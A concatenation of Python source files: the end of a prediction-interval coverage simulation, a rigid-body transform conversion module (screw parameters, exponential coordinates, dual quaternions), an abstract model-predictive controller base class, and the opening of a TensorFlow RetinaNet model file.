results[method][dimension]["coverage"][trial] = coverage_score(
y_test, y_preds[:, 1], y_preds[:, 2]
)
results[method][dimension]["width_mean"][trial] = (
y_preds[:, 2] - y_preds[:, 1]
).mean()
return results
def plot_simulation_results(
results: Dict[str, Dict[int, Dict[str, np.ndarray]]],
title: str
) -> None:
"""
Show the prediction interval coverages and widths as function of dimension values
for selected methods with standard error given by different trials.
Parameters
----------
results : Dict[str, Dict[int, Dict[str, np.ndarray]]]
Prediction interval widths and coverages for each method, trial,
and dimension value.
title : str
Title of the plot.
"""
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5))
plt.rcParams.update({"font.size": 14})
plt.suptitle(title)
for method in results:
dimensions = list(results[method].keys())
n_dim = len(dimensions)
coverage_mean, coverage_SE, width_mean, width_SE = (
np.zeros(n_dim), np.zeros(n_dim), np.zeros(n_dim), np.zeros(n_dim)
)
for idim, dimension in enumerate(dimensions):
coverage_mean[idim] = results[method][dimension]["coverage"].mean()
coverage_SE[idim] = results[method][dimension]["coverage"].std()/np.sqrt(ntrial)
width_mean[idim] = results[method][dimension]["width_mean"].mean()
width_SE[idim] = results[method][dimension]["width_mean"].std()/np.sqrt(ntrial)
ax1.plot(dimensions, coverage_mean, label=method)
ax1.fill_between(
dimensions, coverage_mean - coverage_SE, coverage_mean + coverage_SE, alpha=0.25
)
ax2.plot(dimensions, width_mean, label=method)
ax2.fill_between(
dimensions, width_mean - width_SE, width_mean + width_SE, alpha=0.25
)
ax1.axhline(1 - alpha, linestyle="dashed", c="k")
ax1.set_ylim(0.0, 1.0)
ax1.set_xlabel("Dimension d")
ax1.set_ylabel("Coverage")
ax1.legend()
ax2.set_ylim(0, 20)
ax2.set_xlabel("Dimension d")
ax2.set_ylabel("Interval width")
ax2.legend()
methods = [
"naive",
"cv",
"cv_plus"
]
alpha = 0.1
ntrial = 1
dimensions = np.arange(10, 150, 10)
results = PIs_vs_dimensions(methods, alpha, ntrial, dimensions)
plot_simulation_results(results, title="Coverages and interval widths")
|
"""Conversions between transform representations."""
import math
import numpy as np
from ._utils import (check_transform, check_pq, check_screw_axis,
check_screw_parameters, check_exponential_coordinates,
check_screw_matrix, check_transform_log,
check_dual_quaternion)
from ..rotations import (
matrix_from_quaternion, quaternion_from_matrix, axis_angle_from_matrix,
matrix_from_axis_angle, cross_product_matrix, q_conj,
concatenate_quaternions, axis_angle_from_quaternion, norm_angle, eps)
def transform_from(R, p, strict_check=True):
"""Make transformation from rotation matrix and translation.
Parameters
----------
R : array-like, shape (3, 3)
Rotation matrix
p : array-like, shape (3,)
Translation
strict_check : bool, optional (default: True)
Raise a ValueError if the transformation matrix is not numerically
close enough to a real transformation matrix. Otherwise we print a
warning.
Returns
-------
A2B : array-like, shape (4, 4)
Transform from frame A to frame B
"""
A2B = rotate_transform(
np.eye(4), R, strict_check=strict_check, check=False)
A2B = translate_transform(
A2B, p, strict_check=strict_check, check=False)
return A2B
def translate_transform(A2B, p, strict_check=True, check=True):
"""Sets the translation of a transform.
Parameters
----------
A2B : array-like, shape (4, 4)
Transform from frame A to frame B
p : array-like, shape (3,)
Translation
strict_check : bool, optional (default: True)
Raise a ValueError if the transformation matrix is not numerically
close enough to a real transformation matrix. Otherwise we print a
warning.
check : bool, optional (default: True)
Check if transformation matrix is valid
Returns
-------
A2B : array-like, shape (4, 4)
Transform from frame A to frame B
"""
if check:
A2B = check_transform(A2B, strict_check=strict_check)
out = A2B.copy()
out[:3, -1] = p
return out
def rotate_transform(A2B, R, strict_check=True, check=True):
"""Sets the rotation of a transform.
Parameters
----------
A2B : array-like, shape (4, 4)
Transform from frame A to frame B
R : array-like, shape (3, 3)
Rotation matrix
strict_check : bool, optional (default: True)
Raise a ValueError if the transformation matrix is not numerically
close enough to a real transformation matrix. Otherwise we print a
warning.
check : bool, optional (default: True)
Check if transformation matrix is valid
Returns
-------
A2B : array-like, shape (4, 4)
Transform from frame A to frame B
"""
if check:
A2B = check_transform(A2B, strict_check=strict_check)
out = A2B.copy()
out[:3, :3] = R
return out
def pq_from_transform(A2B, strict_check=True):
"""Compute position and quaternion from transformation matrix.
Parameters
----------
A2B : array-like, shape (4, 4)
Transformation matrix from frame A to frame B
strict_check : bool, optional (default: True)
Raise a ValueError if the transformation matrix is not numerically
close enough to a real transformation matrix. Otherwise we print a
warning.
Returns
-------
pq : array-like, shape (7,)
Position and orientation quaternion: (x, y, z, qw, qx, qy, qz)
"""
A2B = check_transform(A2B, strict_check=strict_check)
return np.hstack((A2B[:3, 3], quaternion_from_matrix(A2B[:3, :3])))
def transform_from_pq(pq):
"""Compute transformation matrix from position and quaternion.
Parameters
----------
pq : array-like, shape (7,)
Position and orientation quaternion: (x, y, z, qw, qx, qy, qz)
Returns
-------
A2B : array-like, shape (4, 4)
Transformation matrix from frame A to frame B
"""
pq = check_pq(pq)
return transform_from(matrix_from_quaternion(pq[3:]), pq[:3])
def screw_parameters_from_screw_axis(screw_axis):
"""Compute screw parameters from screw axis.
Note that there is not just one solution since q can be any point on the
screw axis. We select q so that it is orthogonal to s_axis.
Parameters
----------
screw_axis : array-like, shape (6,)
Screw axis described by 6 values
(omega_1, omega_2, omega_3, v_1, v_2, v_3),
where the first 3 components are related to rotation and the last 3
components are related to translation.
Returns
-------
q : array, shape (3,)
Vector to a point on the screw axis that is orthogonal to s_axis
s_axis : array, shape (3,)
Unit direction vector of the screw axis
h : float
Pitch of the screw. The pitch is the ratio of translation and rotation
of the screw axis. Infinite pitch indicates pure translation.
"""
screw_axis = check_screw_axis(screw_axis)
omega = screw_axis[:3]
v = screw_axis[3:]
omega_norm = np.linalg.norm(omega)
if abs(omega_norm) < np.finfo(float).eps: # pure translation
q = np.zeros(3)
s_axis = v
h = np.inf
else:
s_axis = omega
h = omega.dot(v)
moment = v - h * s_axis
q = np.cross(s_axis, moment)
return q, s_axis, h
def screw_axis_from_screw_parameters(q, s_axis, h):
"""Compute screw axis representation from screw parameters.
Parameters
----------
q : array-like, shape (3,)
Vector to a point on the screw axis
s_axis : array-like, shape (3,)
Direction vector of the screw axis
h : float
Pitch of the screw. The pitch is the ratio of translation and rotation
of the screw axis. Infinite pitch indicates pure translation.
Returns
-------
screw_axis : array, shape (6,)
Screw axis described by 6 values
(omega_1, omega_2, omega_3, v_1, v_2, v_3),
where the first 3 components are related to rotation and the last 3
components are related to translation.
"""
q, s_axis, h = check_screw_parameters(q, s_axis, h)
if np.isinf(h): # pure translation
return np.r_[0.0, 0.0, 0.0, s_axis]
else:
return np.r_[s_axis, np.cross(q, s_axis) + h * s_axis]
def screw_axis_from_exponential_coordinates(Stheta):
"""Compute screw axis and theta from exponential coordinates.
Parameters
----------
Stheta : array-like, shape (6,)
Exponential coordinates of transformation:
S * theta = (omega_1, omega_2, omega_3, v_1, v_2, v_3) * theta,
where the first 3 components are related to rotation and the last 3
components are related to translation. Theta is the rotation angle
and h * theta the translation. Theta should be >= 0. Negative rotations
will be represented by a negative screw axis instead. This is relevant
if you want to recover theta from exponential coordinates.
Returns
-------
screw_axis : array, shape (6,)
Screw axis described by 6 values
(omega_1, omega_2, omega_3, v_1, v_2, v_3),
where the first 3 components are related to rotation and the last 3
components are related to translation.
theta : float
Parameter of the transformation: theta is the angle of rotation
and h * theta the translation.
"""
Stheta = check_exponential_coordinates(Stheta)
omega_theta = Stheta[:3]
v_theta = Stheta[3:]
theta = np.linalg.norm(omega_theta)
if theta < np.finfo(float).eps:
theta = np.linalg.norm(v_theta)
if theta < np.finfo(float).eps:
return np.zeros(6), 0.0
return Stheta / theta, theta
def screw_axis_from_screw_matrix(screw_matrix):
"""Compute screw axis from screw matrix.
Parameters
----------
screw_matrix : array-like, shape (4, 4)
A screw matrix consists of a cross-product matrix that represents an
axis of rotation, a translation, and a row of zeros.
Returns
-------
screw_axis : array, shape (6,)
Screw axis described by 6 values
(omega_1, omega_2, omega_3, v_1, v_2, v_3),
where the first 3 components are related to rotation and the last 3
components are related to translation.
"""
screw_matrix = check_screw_matrix(screw_matrix)
screw_axis = np.empty(6)
screw_axis[0] = screw_matrix[2, 1]
screw_axis[1] = screw_matrix[0, 2]
screw_axis[2] = screw_matrix[1, 0]
screw_axis[3:] = screw_matrix[:3, 3]
return screw_axis
def exponential_coordinates_from_screw_axis(screw_axis, theta):
"""Compute exponential coordinates from screw axis and theta.
Parameters
----------
screw_axis : array-like, shape (6,)
Screw axis described by 6 values
(omega_1, omega_2, omega_3, v_1, v_2, v_3),
where the first 3 components are related to rotation and the last 3
components are related to translation.
theta : float
Parameter of the transformation: theta is the angle of rotation
and h * theta the translation.
Returns
-------
Stheta : array, shape (6,)
Exponential coordinates of transformation:
S * theta = (omega_1, omega_2, omega_3, v_1, v_2, v_3) * theta,
where the first 3 components are related to rotation and the last 3
components are related to translation. Theta is the rotation angle
and h * theta the translation. Theta should be >= 0. Negative rotations
will be represented by a negative screw axis instead. This is relevant
if you want to recover theta from exponential coordinates.
"""
screw_axis = check_screw_axis(screw_axis)
return screw_axis * theta
def exponential_coordinates_from_transform_log(transform_log, check=True):
"""Compute exponential coordinates from logarithm of transformation.
Parameters
----------
transform_log : array-like, shape (4, 4)
Matrix logarithm of transformation matrix: [S] * theta.
check : bool, optional (default: True)
Check if logarithm of transformation is valid
Returns
-------
Stheta : array, shape (6,)
Exponential coordinates of transformation:
S * theta = (omega_1, omega_2, omega_3, v_1, v_2, v_3) * theta,
where S is the screw axis, the first 3 components are related to
rotation and the last 3 components are related to translation.
Theta is the rotation angle and h * theta the translation.
"""
if check:
transform_log = check_transform_log(transform_log)
Stheta = np.empty(6)
Stheta[0] = transform_log[2, 1]
Stheta[1] = transform_log[0, 2]
Stheta[2] = transform_log[1, 0]
Stheta[3:] = transform_log[:3, 3]
return Stheta
def exponential_coordinates_from_transform(A2B, strict_check=True, check=True):
"""Compute exponential coordinates from transformation matrix.
Logarithmic map.
Parameters
----------
A2B : array-like, shape (4, 4)
Transformation matrix from frame A to frame B
strict_check : bool, optional (default: True)
Raise a ValueError if the transformation matrix is not numerically
close enough to a real transformation matrix. Otherwise we print a
warning.
check : bool, optional (default: True)
Check if transformation matrix is valid
Returns
-------
Stheta : array, shape (6,)
Exponential coordinates of transformation:
S * theta = (omega_1, omega_2, omega_3, v_1, v_2, v_3) * theta,
where S is the screw axis, the first 3 components are related to
rotation and the last 3 components are related to translation.
Theta is the rotation angle and h * theta the translation.
"""
if check:
A2B = check_transform(A2B, strict_check=strict_check)
R = A2B[:3, :3]
p = A2B[:3, 3]
if np.linalg.norm(np.eye(3) - R) < np.finfo(float).eps:
return np.r_[0.0, 0.0, 0.0, p]
omega_theta = axis_angle_from_matrix(R, check=check)
omega_unit = omega_theta[:3]
theta = omega_theta[3]
if theta == 0:
return np.r_[0.0, 0.0, 0.0, p]
omega_unit_matrix = cross_product_matrix(omega_unit)
G_inv = (np.eye(3) / theta - 0.5 * omega_unit_matrix
+ (1.0 / theta - 0.5 / np.tan(theta / 2.0))
* np.dot(omega_unit_matrix, omega_unit_matrix))
v = G_inv.dot(p)
return np.hstack((omega_unit, v)) * theta
def screw_matrix_from_screw_axis(screw_axis):
"""Compute screw matrix from screw axis.
Parameters
----------
screw_axis : array-like, shape (6,)
Screw axis described by 6 values
(omega_1, omega_2, omega_3, v_1, v_2, v_3),
where the first 3 components are related to rotation and the last 3
components are related to translation.
Returns
-------
screw_matrix : array, shape (4, 4)
A screw matrix consists of a cross-product matrix that represents an
axis of rotation, a translation, and a row of zeros.
"""
screw_axis = check_screw_axis(screw_axis)
omega = screw_axis[:3]
v = screw_axis[3:]
screw_matrix = np.zeros((4, 4))
screw_matrix[:3, :3] = cross_product_matrix(omega)
screw_matrix[:3, 3] = v
return screw_matrix
def screw_matrix_from_transform_log(transform_log):
"""Compute screw matrix from logarithm of transformation.
Parameters
----------
transform_log : array-like, shape (4, 4)
Matrix logarithm of transformation matrix: [S] * theta.
Returns
-------
screw_matrix : array, shape (4, 4)
A screw matrix consists of a cross-product matrix that represents an
axis of rotation, a translation, and a row of zeros.
"""
transform_log = check_transform_log(transform_log)
omega = np.array([
transform_log[2, 1], transform_log[0, 2], transform_log[1, 0]])
theta = np.linalg.norm(omega)
if abs(theta) < np.finfo(float).eps:
theta = np.linalg.norm(transform_log[:3, 3])
if abs(theta) < np.finfo(float).eps:
return np.zeros((4, 4)), 0.0
return transform_log / theta, theta
def transform_log_from_exponential_coordinates(Stheta):
"""Compute matrix logarithm of transformation from exponential coordinates.
Parameters
----------
Stheta : array-like, shape (6,)
Exponential coordinates of transformation:
S * theta = (omega_1, omega_2, omega_3, v_1, v_2, v_3) * theta,
where S is the screw axis, the first 3 components are related to
rotation and the last 3 components are related to translation.
Theta is the rotation angle and h * theta the translation.
Returns
-------
transform_log : array, shape (4, 4)
Matrix logarithm of transformation matrix: [S] * theta.
"""
check_exponential_coordinates(Stheta)
omega = Stheta[:3]
v = Stheta[3:]
transform_log = np.zeros((4, 4))
transform_log[:3, :3] = cross_product_matrix(omega)
transform_log[:3, 3] = v
return transform_log
def transform_log_from_screw_matrix(screw_matrix, theta):
"""Compute matrix logarithm of transformation from screw matrix and theta.
Parameters
----------
screw_matrix : array-like, shape (4, 4)
A screw matrix consists of a cross-product matrix that represents an
axis of rotation, a translation, and a row of zeros.
theta : float
Parameter of the transformation: theta is the angle of rotation
and h * theta the translation.
Returns
-------
transform_log : array, shape (4, 4)
Matrix logarithm of transformation matrix: [S] * theta.
"""
screw_matrix = check_screw_matrix(screw_matrix)
return screw_matrix * theta
def transform_log_from_transform(A2B, strict_check=True):
"""Compute matrix logarithm of transformation from transformation.
Parameters
----------
A2B : array, shape (4, 4)
Transform from frame A to frame B
strict_check : bool, optional (default: True)
Raise a ValueError if the transformation matrix is not numerically
close enough to a real transformation matrix. Otherwise we print a
warning.
Returns
-------
transform_log : array, shape (4, 4)
Matrix logarithm of transformation matrix: [S] * theta.
"""
A2B = check_transform(A2B, strict_check=strict_check)
R = A2B[:3, :3]
p = A2B[:3, 3]
transform_log = np.zeros((4, 4))
if np.linalg.norm(np.eye(3) - R) < np.finfo(float).eps:
transform_log[:3, 3] = p
return transform_log
omega_theta = axis_angle_from_matrix(R)
omega_unit = omega_theta[:3]
theta = omega_theta[3]
if theta == 0:
return transform_log
omega_unit_matrix = cross_product_matrix(omega_unit)
G_inv = (np.eye(3) / theta - 0.5 * omega_unit_matrix
+ (1.0 / theta - 0.5 / np.tan(theta / 2.0))
* np.dot(omega_unit_matrix, omega_unit_matrix))
v = G_inv.dot(p)
transform_log[:3, :3] = omega_unit_matrix
transform_log[:3, 3] = v
transform_log *= theta
return transform_log
def transform_from_exponential_coordinates(Stheta, check=True):
"""Compute transformation matrix from exponential coordinates.
Exponential map.
Parameters
----------
Stheta : array-like, shape (6,)
Exponential coordinates of transformation:
S * theta = (omega_1, omega_2, omega_3, v_1, v_2, v_3) * theta,
where S is the screw axis, the first 3 components are related to
rotation and the last 3 components are related to translation.
Theta is the rotation angle and h * theta the translation.
check : bool, optional (default: True)
Check if exponential coordinates are valid
Returns
-------
A2B : array, shape (4, 4)
Transformation matrix from frame A to frame B
"""
if check:
Stheta = check_exponential_coordinates(Stheta)
omega_theta = Stheta[:3]
theta = np.linalg.norm(omega_theta)
if theta == 0.0: # only translation
return translate_transform(np.eye(4), Stheta[3:], check=check)
screw_axis = Stheta / theta
omega_unit = screw_axis[:3]
v = screw_axis[3:]
A2B = np.eye(4)
A2B[:3, :3] = matrix_from_axis_angle(np.r_[omega_unit, theta])
omega_matrix = cross_product_matrix(omega_unit)
A2B[:3, 3] = np.dot(
np.eye(3) * theta
+ (1.0 - math.cos(theta)) * omega_matrix
+ (theta - math.sin(theta)) * np.dot(omega_matrix, omega_matrix),
v)
return A2B
def transform_from_transform_log(transform_log):
"""Compute transformation from matrix logarithm of transformation.
Parameters
----------
transform_log : array-like, shape (4, 4)
Matrix logarithm of transformation matrix: [S] * theta.
Returns
-------
A2B : array, shape (4, 4)
Transform from frame A to frame B
"""
transform_log = check_transform_log(transform_log)
omega_theta = np.array([
transform_log[2, 1], transform_log[0, 2], transform_log[1, 0]])
v = transform_log[:3, 3]
theta = np.linalg.norm(omega_theta)
if theta == 0.0: # only translation
return translate_transform(np.eye(4), v)
omega_unit = omega_theta / theta
v = v / theta
A2B = np.eye(4)
A2B[:3, :3] = matrix_from_axis_angle(np.r_[omega_unit, theta])
omega_unit_matrix = transform_log[:3, :3] / theta
G = (np.eye(3) * theta
+ (1.0 - math.cos(theta)) * omega_unit_matrix
+ (theta - math.sin(theta)) * np.dot(omega_unit_matrix,
omega_unit_matrix))
A2B[:3, 3] = np.dot(G, v)
return A2B
def dual_quaternion_from_transform(A2B):
"""Compute dual quaternion from transformation matrix.
Parameters
----------
A2B : array-like, shape (4, 4)
Transform from frame A to frame B
Returns
-------
dq : array, shape (8,)
Unit dual quaternion to represent transform:
(pw, px, py, pz, qw, qx, qy, qz)
"""
A2B = check_transform(A2B)
real = quaternion_from_matrix(A2B[:3, :3])
dual = 0.5 * concatenate_quaternions(
np.r_[0, A2B[:3, 3]], real)
return np.hstack((real, dual))
def dual_quaternion_from_pq(pq):
"""Compute dual quaternion from position and quaternion.
Parameters
----------
pq : array-like, shape (7,)
Position and orientation quaternion: (x, y, z, qw, qx, qy, qz)
Returns
-------
dq : array, shape (8,)
Unit dual quaternion to represent transform:
(pw, px, py, pz, qw, qx, qy, qz)
"""
pq = check_pq(pq)
real = pq[3:]
dual = 0.5 * concatenate_quaternions(
np.r_[0, pq[:3]], real)
return np.hstack((real, dual))
def dual_quaternion_from_screw_parameters(q, s_axis, h, theta):
"""Compute dual quaternion from screw parameters.
Parameters
----------
q : array-like, shape (3,)
Vector to a point on the screw axis
s_axis : array-like, shape (3,)
Direction vector of the screw axis
h : float
Pitch of the screw. The pitch is the ratio of translation and rotation
of the screw axis. Infinite pitch indicates pure translation.
theta : float
Parameter of the transformation: theta is the angle of rotation
and h * theta the translation.
Returns
-------
dq : array, shape (8,)
Unit dual quaternion to represent transform:
(pw, px, py, pz, qw, qx, qy, qz)
"""
q, s_axis, h = check_screw_parameters(q, s_axis, h)
if np.isinf(h): # pure translation
d = theta
theta = 0
else:
d = h * theta
moment = np.cross(q, s_axis)
half_distance = 0.5 * d
sin_half_angle = np.sin(0.5 * theta)
cos_half_angle = np.cos(0.5 * theta)
real_w = cos_half_angle
real_vec = sin_half_angle * s_axis
dual_w = -half_distance * sin_half_angle
dual_vec = (sin_half_angle * moment +
half_distance * cos_half_angle * s_axis)
return np.r_[real_w, real_vec, dual_w, dual_vec]
def transform_from_dual_quaternion(dq):
"""Compute transformation matrix from dual quaternion.
Parameters
----------
dq : array-like, shape (8,)
Unit dual quaternion to represent transform:
(pw, px, py, pz, qw, qx, qy, qz)
Returns
-------
A2B : array, shape (4, 4)
Transform from frame A to frame B
"""
dq = check_dual_quaternion(dq)
real = dq[:4]
dual = dq[4:]
R = matrix_from_quaternion(real)
p = 2 * concatenate_quaternions(dual, q_conj(real))[1:]
return transform_from(R=R, p=p)
def pq_from_dual_quaternion(dq):
"""Compute position and quaternion from dual quaternion.
Parameters
----------
dq : array-like, shape (8,)
Unit dual quaternion to represent transform:
(pw, px, py, pz, qw, qx, qy, qz)
Returns
-------
pq : array, shape (7,)
Position and orientation quaternion: (x, y, z, qw, qx, qy, qz)
"""
dq = check_dual_quaternion(dq)
real = dq[:4]
dual = dq[4:]
p = 2 * concatenate_quaternions(dual, q_conj(real))[1:]
return np.hstack((p, real))
def screw_parameters_from_dual_quaternion(dq):
"""Compute screw parameters from dual quaternion.
Parameters
----------
dq : array-like, shape (8,)
Unit dual quaternion to represent transform:
(pw, px, py, pz, qw, qx, qy, qz)
Returns
-------
q : array, shape (3,)
Vector to a point on the screw axis
s_axis : array, shape (3,)
Direction vector of the screw axis
h : float
Pitch of the screw. The pitch is the ratio of translation and rotation
of the screw axis. Infinite pitch indicates pure translation.
theta : float
Parameter of the transformation: theta is the angle of rotation
and h * theta the translation.
"""
dq = check_dual_quaternion(dq, unit=True)
real = dq[:4]
dual = dq[4:]
a = axis_angle_from_quaternion(real)
s_axis = a[:3]
theta = a[3]
translation = 2 * concatenate_quaternions(dual, q_conj(real))[1:]
if abs(theta) < np.finfo(float).eps:
# pure translation
d = np.linalg.norm(translation)
if d < np.finfo(float).eps:
s_axis = np.array([1, 0, 0])
else:
s_axis = translation / d
q = np.zeros(3)
theta = d
h = np.inf
return q, s_axis, h, theta
else:
distance = np.dot(translation, s_axis)
moment = 0.5 * (np.cross(translation, s_axis) +
(translation - distance * s_axis)
/ np.tan(0.5 * theta))
dual = np.cross(s_axis, moment)
h = distance / theta
return dual, s_axis, h, theta
def adjoint_from_transform(A2B, strict_check=True, check=True):
"""Compute adjoint representation of a transformation matrix.
The adjoint representation of a transformation
:math:`\\left[Ad_{\\boldsymbol{T}_{BA}}\\right]`
from frame A to frame B translates a twist from frame A to frame B
through the adjoint map
.. math::
\\mathcal{V}_{B}
= \\left[Ad_{\\boldsymbol{T}_{BA}}\\right] \\mathcal{V}_A
The corresponding matrix form is
.. math::
\\left[\\mathcal{V}_{B}\\right]
= \\boldsymbol{T}_{BA} \\left[\\mathcal{V}_A\\right]
\\boldsymbol{T}_{BA}^{-1}
We can also use the adjoint representation to transform a wrench from frame
A to frame B:
.. math::
\\mathcal{F}_B
= \\left[ Ad_{\\boldsymbol{T}_{AB}} \\right]^T \\mathcal{F}_A
Note that not only the adjoint is transposed but also the transformation is
inverted.
Adjoint representations have the following properties:
.. math::
\\left[Ad_{\\boldsymbol{T}_1 \\boldsymbol{T}_2}\\right]
= \\left[Ad_{\\boldsymbol{T}_1}\\right]
\\left[Ad_{\\boldsymbol{T}_2}\\right]
.. math::
\\left[Ad_{\\boldsymbol{T}}\\right]^{-1} =
\\left[Ad_{\\boldsymbol{T}^{-1}}\\right]
Parameters
----------
A2B : array-like, shape (4, 4)
Transform from frame A to frame B
strict_check : bool, optional (default: True)
Raise a ValueError if the transformation matrix is not numerically
close enough to a real transformation matrix. Otherwise we print a
warning.
check : bool, optional (default: True)
Check if transformation matrix is valid
Returns
-------
adj_A2B : array, shape (6, 6)
Adjoint representation of transformation matrix
"""
if check:
A2B = check_transform(A2B, strict_check)
R = A2B[:3, :3]
p = A2B[:3, 3]
adj_A2B = np.zeros((6, 6))
adj_A2B[:3, :3] = R
adj_A2B[3:, :3] = np.dot(cross_product_matrix(p), R)
adj_A2B[3:, 3:] = R
return adj_A2B
def norm_exponential_coordinates(Stheta):
"""Normalize exponential coordinates of transformation.
Parameters
----------
Stheta : array-like, shape (6,)
Exponential coordinates of transformation:
S * theta = (omega_1, omega_2, omega_3, v_1, v_2, v_3) * theta,
where the first 3 components are related to rotation and the last 3
components are related to translation. Theta is the rotation angle
and h * theta the translation. Theta should be >= 0. Negative rotations
will be represented by a negative screw axis instead. This is relevant
if you want to recover theta from exponential coordinates.
Returns
-------
Stheta : array, shape (6,)
Normalized exponential coordinates of transformation with theta in
[0, pi]. Note that in the case of pure translation no normalization
is required because the representation is unique. In the case of
rotation by pi, there is an ambiguity that will be resolved so that
the screw pitch is positive.
"""
theta = np.linalg.norm(Stheta[:3])
if theta == 0.0:
return Stheta
screw_axis = Stheta / theta
q, s_axis, h = screw_parameters_from_screw_axis(screw_axis)
if abs(theta - np.pi) < eps and h < 0:
h *= -1.0
s_axis *= -1.0
theta_normed = norm_angle(theta)
h_normalized = h * theta / theta_normed
screw_axis = screw_axis_from_screw_parameters(q, s_axis, h_normalized)
return screw_axis * theta_normed
|
#!/usr/bin/env python
"""
Base class for controllers
Author - <NAME>
Date: 3 Jan, 2020
"""
from abc import ABC, abstractmethod
import copy
from gym.utils import seeding
import numpy as np
from mjmpc.utils import helpers
class Controller(ABC):
def __init__(self,
d_state,
d_obs,
d_action,
action_lows,
action_highs,
horizon,
gamma,
n_iters,
set_sim_state_fn=None,
rollout_fn=None,
sample_mode='mean',
batch_size=1,
seed=0):
"""
Parameters
----------
d_state : int
size of state/observation space
d_action : int
size of action space
action_lows : np.ndarray
lower limits for each action dim
action_highs : np.ndarray
upper limits for each action dim
horizon : int
horizon of rollouts
gamma : float
discount factor
n_iters : int
number of optimization iterations
set_sim_state_fn : function
set state of simulator using input
get_sim_state_fn : function
get state from the simulator
sim_step_fn : function
steps the simulator and returns obs, reward, done, info
sim_reset_fn : function
resets the simulator
rollout_fn : function
rollout policy (or actions) in simulator and return obs, reward, done, info
sample_mode : {'mean', 'sample'}
how to choose action to be executed
'mean' plays the first mean action and
'sample' samples from the distribution
batch_size : int
optimize for a batch of states
seed : int
seed value
"""
self.d_state = d_state
self.d_obs = d_obs
self.d_action = d_action
self.action_lows = action_lows
self.action_highs = action_highs
self.horizon = horizon
self.gamma = gamma
self.gamma_seq = np.cumprod([1.0] + [self.gamma] * (horizon - 1)).reshape(1, horizon)
self.n_iters = n_iters
self._set_sim_state_fn = set_sim_state_fn
self._rollout_fn = rollout_fn
self.sample_mode = sample_mode
self.batch_size = batch_size
self.num_steps = 0
self.seed_val = self.seed(seed)
@abstractmethod
def _get_next_action(self, mode='mean'):
"""
Get action to execute on the system based
on current control distribution
Parameters
----------
mode : {'mean', 'sample'}
how to choose action to be executed
'mean' plays the first mean action and
'sample' samples from the distribution
"""
pass
def sample_actions(self):
"""
Sample actions from current control distribution
"""
raise NotImplementedError('sample_actions funtion not implemented')
@abstractmethod
def _update_distribution(self, trajectories):
"""
Update current control distribution using
rollout trajectories
Parameters
trajectories : dict
Rollout trajectories. Contains the following fields
observations : np.ndarray ()
observations along rollouts
actions : np.ndarray
actions sampled from control distribution along rollouts
costs : np.ndarray
step costs along rollouts
dones : np.ndarray
bool signalling end of episode
"""
pass
@abstractmethod
def _shift(self):
"""
Shift the current control distribution
to hotstart the next timestep
"""
pass
@abstractmethod
def reset(self):
"""
Reset the controller
"""
pass
@abstractmethod
def _calc_val(self, cost_seq, act_seq):
"""
Calculate value of state given
rollouts from a policy
"""
pass
def check_convergence(self):
"""
Checks if controller has converged
Returns False by default
"""
return False
@property
def set_sim_state_fn(self):
return self._set_sim_state_fn
@set_sim_state_fn.setter
def set_sim_state_fn(self, fn):
"""
Set function that sets the simulation
environment to a particular state
"""
self._set_sim_state_fn = fn
@property
def rollout_fn(self):
return self._rollout_fn
@rollout_fn.setter
def rollout_fn(self, fn):
"""
Set the rollout function from
input function pointer
"""
self._rollout_fn = fn
# def generate_rollouts(self, state):
# """
# Samples a batch of actions, rolls out trajectories for each particle
# and returns the resulting observations, costs,
# actions
# Parameters
# ----------
# state : dict or np.ndarray
# Initial state to set the simulation env to
# """
# self._set_sim_state_fn(copy.deepcopy(state)) #set state of simulation
# act_seq = self.sample_actions() #sample actions using current control distribution
# # obs_seq, cost_seq, done_seq, info_seq = self._rollout_fn(act_seq) # rollout function returns the costs
# trajectories = self._rollout_fn(act_seq)
# # trajectories = dict(
# # observations=obs_seq,
# # actions=act_seq,
# # costs=cost_seq,
# # dones=done_seq,
# # infos=helpers.stack_tensor_dict_list(info_seq)
# # )
# return trajectories
@abstractmethod
def generate_rollouts(self, state):
pass
def optimize(self, state, calc_val=False, hotstart=True):
"""
Optimize for best action at current state
Parameters
----------
state :
state to calculate optimal action from
calc_val : bool
If true, calculate the optimal value estimate
of the state along with action
Returns
-------
action : np.ndarray ()
Raises
------
ValueError
If self._rollout_fn, self._set_sim_state_fn or
self._sim_step_fn are None
"""
# if (self.rollout_fn is None) or (self.set_sim_state_fn is None):
# raise ValueError("rollout_fn and set_sim_state_fn not set!!")
for _ in range(self.n_iters):
# generate random simulated trajectories
trajectory = self.generate_rollouts(copy.deepcopy(state))
# update distribution parameters
self._update_distribution(trajectory)
# check if converged
if self.check_convergence():
break
#calculate best action
curr_action = self._get_next_action(state, mode=self.sample_mode)
#calculate optimal value estimate if required
value = 0.0
if calc_val:
trajectories = self.generate_rollouts(copy.deepcopy(state))
value = self._calc_val(trajectories)
self.num_steps += 1
if hotstart:
# shift distribution to hotstart next timestep
self._shift()
return curr_action, value
def get_optimal_value(self, state):
"""
Calculate optimal value of a state, i.e
value under optimal policy.
Parameters
----------
state : dict or np.ndarray
state to calculate optimal value estimate for
Returns
-------
value : float
optimal value estimate of the state
"""
self.reset() #reset the control distribution
_, value = self.optimize(state, calc_val=True, hotstart=False)
return value
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return seed
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model defination for the RetinaNet Model.
Defines model_fn of RetinaNet for TF Estimator. The model_fn includes RetinaNet
model architecture, loss function, learning rate schedule, and evaluation
procedure.
<NAME>, <NAME>, <NAME>, <NAME>, and <NAME>
Focal Loss for Dense Object Detection. arXiv:1708.02002
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import anchors
import coco_metric
import postprocess
import retinanet_architecture
from tensorflow.contrib import tpu as contrib_tpu
from tensorflow.contrib import training as contrib_training
_DEFAULT_BATCH_SIZE = 64
_WEIGHT_DECAY = 1e-4
def update_learning_rate_schedule_parameters(params):
"""Updates params that are related to the learning rate schedule.
This function adjusts the learning schedule based on the given batch size and
other LR-schedule-related parameters. The default values specified in the
default_hparams() are for training with a batch size of 64 and COCO dataset.
For other batch sizes that train with the same schedule w.r.t. the number of
epochs, this function handles the learning rate schedule.
